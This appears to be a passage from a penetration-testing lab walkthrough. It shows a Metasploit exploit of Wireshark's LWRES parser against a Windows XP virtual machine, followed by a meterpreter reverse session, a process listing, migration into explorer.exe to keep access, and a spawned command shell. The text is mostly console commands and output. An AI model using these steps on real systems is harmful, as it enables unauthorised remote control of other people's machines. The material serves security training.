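If Wireshark is closed on the victim, the connection is lost, because the session runs inside the wireshark.exe process (PID 492 in the process list below). In that case, start a capture in Wireshark again and retry the attack.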
msf6 exploit(multi/misc/wireshark_lwres_getaddrbyname_loop) > sessions
Active sessions
===============
Id  Name  Type                     Information                      Connection
--  ----  ----                     -----------                      ----------
2         meterpreter x86/windows  VICTIM_WINXP\ksw @ VICTIM_WINXP  192.168.108.102:4444 -> 192.168.108.105:1036 (192.168.108.105)
msf6 exploit(multi/misc/wireshark_lwres_getaddrbyname_loop) > sessions 2
[*] Starting interaction with 2...
meterpreter > help migrate
Usage: migrate <<pid> | -P <pid> | -N <name>> [-t timeout]
Migrates the server instance to another process.
NOTE: Any open channels or other dynamic state will be lost.
meterpreter > help ps
Usage: ps [ options ] pattern
Use the command with no arguments to see all running processes.
The following options can be used to filter those results:
OPTIONS:
-A <opt> Filter on architecture
-S <opt> Filter on process name
-U <opt> Filter on user name
-c Filter only child processes of the current shell
-h Help menu.
-s Filter only SYSTEM processes
-x Filter for exact matches rather than regex
meterpreter > ps
Process List
============
PID   PPID  Name               Arch  Session  User                 Path
---   ----  ----               ----  -------  ----                 ----
0     0     [System Process]
4     0     System             x86   0
208   904   wmiprvse.exe       x86   0                             C:\WINDOWS\system32\wbem\wmiprvse.exe
324   1020  wscntfy.exe        x86   0        VICTIM_WINXP\ksw     C:\WINDOWS\system32\wscntfy.exe
492   1376  wireshark.exe      x86   0        VICTIM_WINXP\ksw     C:\Program Files\Wireshark\wireshark.exe
584   728   alg.exe            x86   0                             C:\WINDOWS\System32\alg.exe
596   4     smss.exe           x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
636   1376  rundll32.exe       x86   0        VICTIM_WINXP\ksw     C:\WINDOWS\system32\rundll32.exe
660   596   csrss.exe          x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
684   596   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
728   684   services.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
740   684   lsass.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
800   492   dumpcap.exe        x86   0        VICTIM_WINXP\ksw     C:\Program Files\Wireshark\dumpcap.exe
892   728   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmacthlp.exe
904   728   svchost.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
936   1376  vmtoolsd.exe       x86   0        VICTIM_WINXP\ksw     C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
984   728   svchost.exe        x86   0                             C:\WINDOWS\system32\svchost.exe
1020  728   svchost.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
1072  728   svchost.exe        x86   0                             C:\WINDOWS\system32\svchost.exe
1128  728   svchost.exe        x86   0                             C:\WINDOWS\system32\svchost.exe
1144  1376  ctfmon.exe         x86   0        VICTIM_WINXP\ksw     C:\WINDOWS\system32\ctfmon.exe
1276  1452  conime.exe         x86   0        VICTIM_WINXP\ksw     C:\WINDOWS\system32\conime.exe
1376  1348  explorer.exe       x86   0        VICTIM_WINXP\ksw     C:\WINDOWS\Explorer.EXE
1488  728   spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
1584  728   svchost.exe        x86   0                             C:\WINDOWS\system32\svchost.exe
1688  728   VGAuthService.exe  x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1784  728   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1980  1020  wuauclt.exe        x86   0        VICTIM_WINXP\ksw     C:\WINDOWS\system32\wuauclt.exe
meterpreter > migrate 1376
[*] Migrating from 492 to 1376...
[*] Migration completed successfully.
meterpreter > shell
Process 184 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\ksw>exit
exit
meterpreter >